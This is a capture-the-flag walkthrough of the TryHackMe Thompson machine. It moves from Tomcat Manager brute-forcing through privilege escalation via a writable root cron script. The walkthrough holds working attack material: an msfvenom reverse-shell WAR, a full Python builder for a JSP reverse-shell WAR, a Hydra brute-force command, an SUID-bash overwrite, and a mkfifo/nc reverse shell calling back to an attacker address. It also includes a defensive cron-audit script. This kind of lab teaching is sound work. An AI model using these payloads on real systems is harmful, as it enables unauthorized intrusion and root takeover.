
Introduction:
The TryHackMe Thompson machine is a classic capture-the-flag (CTF) exercise that mirrors real-world web application and privilege escalation vulnerabilities. This walkthrough deconstructs a successful penetration test, highlighting critical misconfigurations in Apache Tomcat and Linux cron jobs that allowed for complete system compromise.
Learning Objectives:
- Understand how to exploit Apache Tomcat misconfigurations to gain an initial foothold.
- Learn the process of crafting and deploying a malicious WAR file for a reverse shell.
- Master techniques for identifying and exploiting writable cron jobs for privilege escalation.
You Should Know:
1. Service Enumeration with Nmap
`nmap -sC -sV -oA thompson_initial 10.10.10.10`
This Nmap command performs a default script scan (-sC) and version detection (-sV) against the target IP, writing the results in all three output formats (-oA: normal, XML and grepable). It is the crucial first step to identify open ports and running services; here it revealed Apache Tomcat on port 8080. Note that without `-p-` Nmap only probes its default top 1000 ports, so a service on an unusual port can be missed.
2. Web Directory Bruteforcing with Gobuster
`gobuster dir -u http://10.10.10.10:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -o gobuster_scan.txt`
Gobuster bruteforces directories on a web server. This command checks the target URL for directories using a medium wordlist (-w) and checks for files with .txt, .php, and .html extensions (-x). This is how common Tomcat management directories like `/manager` are often discovered.
3. Testing Default Tomcat Credentials
Hydra can brute-force the Tomcat Manager login, which is protected by HTTP Basic authentication, so the `http-get` module is the right one.
`hydra -l tomcat -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.10.10 http-get /manager/html`
This Hydra command tests the username `tomcat` against a password list. The `-s 8080` is required because Hydra otherwise targets port 80 and every attempt would fail regardless of the password. Brute-forcing is often unnecessary: a readable `tomcat-users.xml`, or the default Tomcat 401 error page itself, which prints an example `tomcat-users.xml` snippet that administrators sometimes copy verbatim, can leak working credentials.
4. Crafting a Malicious WAR File with MSFVenom
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f war -o shell.war`
MSFVenom generates payloads. This command creates a reverse shell for the Java JSP platform (-p java/jsp_shell_reverse_tcp), sets the listening host and port, packages it as a WAR file (-f war), and writes it to shell.war. The file is uploaded through the "WAR file to deploy" form in the Tomcat Manager interface, which requires an account with the `manager-gui` role. Tomcat deploys it under a context path named after the file (here `/shell`), and the JSP executes the first time `http://10.10.10.10:8080/shell/` is requested.
5. Setting Up a Netcat Listener
`nc -nvlp 4444`
Before triggering the deployed WAR file, a Netcat listener must be established on the specified port (4444). The `-n` avoids DNS resolution, `-v` for verbose output, and `-l -p` to listen on a port. This catches the incoming reverse shell connection, granting initial access.
6. Stabilizing a Shell
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
A raw reverse shell has no TTY, so programs such as `su`, `sudo` and editors misbehave and `Ctrl+C` kills the connection. This Python command spawns bash inside a pseudo-terminal. To finish the upgrade, press `Ctrl+Z` to background the shell, run `stty raw -echo; fg` on the attacking machine, then `export TERM=xterm` in the target shell; this gives job control, tab completion and a usable terminal. If `python3` is missing, try `python`.
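The WAR deployed in step 4 is just a zip archive with a `WEB-INF/web.xml` descriptor and a JSP at its root; Tomcat compiles the JSP into a servlet on the first request. The following added example (not from the walkthrough, which uses msfvenom) builds an equivalent WAR by hand so the structure is visible. The attacker address 10.11.0.4:4444 is the one used in the walkthrough; the file name `index.jsp`, the `web.xml` content and the JSP code are this example's own.

```python
"""Build a JSP reverse-shell WAR by hand (what `msfvenom -f war` automates).

Added example for the Thompson walkthrough. LHOST/LPORT match the walkthrough's
attacking machine and are assumptions for your own lab.
"""
import io
import zipfile

LHOST = "10.11.0.4"   # attacker IP from the walkthrough (assumption for your lab)
LPORT = 4444          # matches the `nc -nvlp 4444` listener
JSP_NAME = "index.jsp"  # name chosen for this example

# Minimal JSP reverse shell: connects back, spawns /bin/sh, relays both streams.
# Placeholders are substituted by render_jsp() so Java braces stay untouched.
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %>
<%
  Socket s = new Socket("__LHOST__", __LPORT__);
  Process p = new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();
  InputStream pi = p.getInputStream(), si = s.getInputStream();
  OutputStream po = p.getOutputStream(), so = s.getOutputStream();
  while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    try { Thread.sleep(50); } catch (InterruptedException e) {}
    try { p.exitValue(); break; } catch (IllegalThreadStateException e) {}
  }
  p.destroy(); s.close();
%>
"""

# The welcome-file makes GET /<context>/ run the JSP, so one request to
# http://<target>:8080/shell/ is enough to trigger the callback.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def render_jsp(lhost: str, lport: int) -> str:
    """Fill the callback address into the JSP source."""
    return JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))


def build_war(lhost: str, lport: int, jsp_name: str = JSP_NAME) -> bytes:
    """Return the WAR as bytes: a zip holding WEB-INF/web.xml and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, render_jsp(lhost, lport))
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """Sorted member names, to sanity-check the archive before uploading it."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def war_member(war_bytes: bytes, name: str) -> str:
    """Read one member of the archive as text."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode()


if __name__ == "__main__":
    data = build_war(LHOST, LPORT)
    with open("shell.war", "wb") as fh:
        fh.write(data)
    print("wrote shell.war:", war_entries(data))
    # Deploy via Manager > "WAR file to deploy" (context path becomes /shell),
    # start `nc -nvlp 4444`, then request http://<target>:8080/shell/ once.
```

Because the context path defaults to the WAR file name, renaming `shell.war` before upload changes the URL you must request; and since the JSP only runs on a request, nothing happens until the deployed application is browsed.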
7. Manual Enumeration for Privilege Escalation Vectors
`find / -type f -perm -u=s 2>/dev/null`
`ls -la /etc/cron*`
`cat /etc/crontab`
After gaining initial access, manual enumeration is key. These three commands search for SUID binaries, list the cron directories (`/etc/cron.d`, `/etc/cron.daily` and so on; there is no `/etc/cron` directory), and display the system-wide crontab, whose entries carry an extra user field that tells you who the command runs as. On the Thompson machine, this reveals a custom cron job running as root.
8. Analyzing a Writable Cron Job Script
`ls -la /usr/local/tomcat/scripts/`
`cat /usr/local/tomcat/scripts/cleanup.sh`
These commands list the scripts directory and display the contents of cleanup.sh. The critical finding is that the script is owned (or writable) by the low-privilege user while the crontab entry runs it as root. Check the directory permissions too: if the directory is writable by your user and lacks the sticky bit, a root-owned, read-only script can still be deleted and replaced, which is the same vulnerability.
9. Exploiting a Writable Cron Script for Root
`echo "chmod u+s /bin/bash" > /usr/local/tomcat/scripts/cleanup.sh`
Since `cleanup.sh` is writable, you can overwrite its contents. This command replaces the script with a single line that sets the SUID bit on /bin/bash; adding a `#!/bin/bash` first line keeps it working even if cron executes the file directly rather than through `sh`. Check the schedule field of the crontab entry to know how long to wait (a `* * * * *` entry fires within a minute), confirm with `ls -l /bin/bash` that the mode now shows `-rwsr-xr-x`, then run `/bin/bash -p`. The `-p` is essential: without it bash drops the effective UID back to your own.
10. Alternative Reverse Shell in Cron Exploit
`echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 5555 >/tmp/f" > /usr/local/tomcat/scripts/cleanup.sh`
This is a more direct method. It overwrites the script with a named-pipe reverse shell that connects back to an attacker listener on port 5555, so a root shell arrives as soon as the cron job runs. Start `nc -nvlp 5555` on the attacking machine before the next scheduled run, and keep in mind that, unlike the SUID approach, this shell lasts only as long as the connection does.
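Steps 7 to 9 found the vulnerable entry by reading the crontab and checking file permissions by hand. The following added example (not part of the walkthrough) automates that audit: it parses system-crontab lines, takes every absolute path in a root-run command, and reports why the current user could change what gets executed (non-root owner, world-writable mode, writable by the current user, or a replaceable file in a writable, non-sticky directory). The sample crontab and the `cleanup.sh` it writes into a temporary directory are constructed for the demonstration.

```python
"""Audit system crontab entries for root-run scripts the current user can modify.

Added example; the walkthrough did this by hand with `cat /etc/crontab` and
`ls -la`. Run it as the low-privilege user: as root everything is writable.
"""
import os
import stat
import tempfile

FIELDS_STD = 5  # minute hour day-of-month month day-of-week


def parse_system_crontab(text):
    """Yield (schedule, user, command) from /etc/crontab or /etc/cron.d text.

    Comments, blank lines and variable assignments (PATH=...) are skipped;
    system crontabs carry a user field that per-user crontabs lack.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        parts = line.split()
        if parts[0].startswith("@"):                   # @reboot, @daily, ...
            schedule, rest = parts[0], parts[1:]
        else:
            schedule, rest = " ".join(parts[:FIELDS_STD]), parts[FIELDS_STD:]
        if len(rest) < 2:
            continue
        yield schedule, rest[0], " ".join(rest[1:])


def writable_by_me(path):
    """Reasons the current user could change what executes at this path."""
    reasons = []
    parent = os.path.dirname(path) or "/"
    try:
        st = os.stat(path)
    except FileNotFoundError:
        # Missing target in a directory we can write: we could create it.
        if os.access(parent, os.W_OK):
            reasons.append("missing target in writable directory " + parent)
        return reasons
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable (mode %o)" % stat.S_IMODE(st.st_mode))
    if os.access(path, os.W_OK):
        reasons.append("writable by current user")
    # A writable parent without the sticky bit lets us unlink and replace the file.
    if os.access(parent, os.W_OK) and not (os.stat(parent).st_mode & stat.S_ISVTX):
        reasons.append("parent directory writable (file can be replaced)")
    return reasons


def audit_crontab(text, root_only=True):
    """Return findings for every absolute path in (root-run) cron commands."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if root_only and user != "root":
            continue
        for tok in command.split():
            if tok.startswith("/"):
                reasons = writable_by_me(tok)
                if reasons:
                    findings.append({"schedule": schedule, "user": user,
                                     "path": tok, "reasons": reasons})
    return findings


# Constructed sample modelled on the walkthrough's finding; {script} is filled in.
SAMPLE_CRONTAB = """# constructed sample crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
30 2 * * * root apt-get clean
* * * * * root {script}
* * * * * tomcat /home/tomcat/rotate.sh
"""


def demo():
    """Create a world-writable script run by root every minute, then audit it."""
    work = tempfile.mkdtemp(prefix="cronaudit-")
    script = os.path.join(work, "cleanup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\nrm -rf /usr/local/tomcat/temp/*\n")
    os.chmod(script, 0o777)  # the misconfiguration under test
    return audit_crontab(SAMPLE_CRONTAB.format(script=script))


if __name__ == "__main__":
    for f in demo():
        print(f["schedule"], f["user"], f["path"])
        for r in f["reasons"]:
            print("   -", r)
```

On a real host, feed it `open("/etc/crontab").read()` plus each file in `/etc/cron.d`. The fix for anything it reports is the mirror image of the check: `chown root:root` and `chmod 755` the script, and make sure its directory is root-owned and not group- or world-writable, so that nothing root executes on a schedule is modifiable by the account that runs the web application.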
What Undercode Say:
- The initial breach is often not through a complex zero-day but a simple misconfiguration like default or leaked credentials.
- Lateral movement and privilege escalation hinge on thorough post-exploitation enumeration; always check cron jobs, SUID binaries, and writable paths.
The Thompson machine is a masterclass in the "chain of failure" concept. A single misconfiguration (leaked credentials) leads to initial access. The system's real flaw, however, is a violation of the principle of least privilege in its automation: a user-writable script executed by root is a catastrophic privilege separation error. This scenario is not just a CTF gimmick; it turns up regularly in audits of internal networks and poorly maintained servers. It underscores that persistence and privilege escalation mechanisms are often built-in system administration features that have been improperly secured.
Prediction:
The techniques demonstrated in this box will remain highly relevant. Misconfigured development and management services (Tomcat, Jenkins and the like) exposed on the internet will continue to be a primary initial access vector for ransomware groups and state-sponsored actors. As organizations rely more heavily on automation via scripts and scheduled jobs, privilege escalation through writable scripts and insecure file permissions will grow with it. The same logic, an overly permissive execution context running code that a less trusted party can modify, applies to CI/CD pipelines and to scheduled cloud automation such as EventBridge rules that invoke Lambda functions, and attacks there should be expected to follow the same pattern.
Reported By: Mohamed Rashith – Hackers Feeds


